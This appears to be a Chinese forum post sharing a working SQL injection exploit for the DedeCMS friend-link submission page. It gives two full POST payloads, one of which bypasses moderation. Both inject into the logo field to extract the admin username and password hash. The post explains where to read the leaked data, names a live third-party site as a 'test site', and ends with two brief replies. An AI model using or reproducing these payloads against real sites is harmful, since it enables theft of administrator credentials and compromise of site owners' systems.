DedeCMs flink通杀SQL注入(无限制)
一:网站要支持申请友链url:/plus/flink_add.php
=--------------------------------------------------------利用开始--------------------------
直接填写验证码,抓包
修改POST数据
写人exp:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`
&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES=1.gif&_FILES=image/gifx&_FILES=10&&_FILES=pass\
validate为验证码,修改提交即可
再打开友情链接
url:plus/flink.php
有个无法显示的图片,查看源码.ok
有部分好像是需要审核的,这里有个过审核的
EXP:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`’`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`’`&typeid=1&url=http%3A%2F%2F&validate=spen&ischeck=1&_FILES=1.gif&_FILES=image/gifx&_FILES=10&&_FILES=pass\
测试站:http://help.cnaaa.com/
图片是上传上去的马? ICBM 发表于 2014-5-1 17:55
图片是上传上去的马?
这是不是getshell,是个注入、
页:
[1]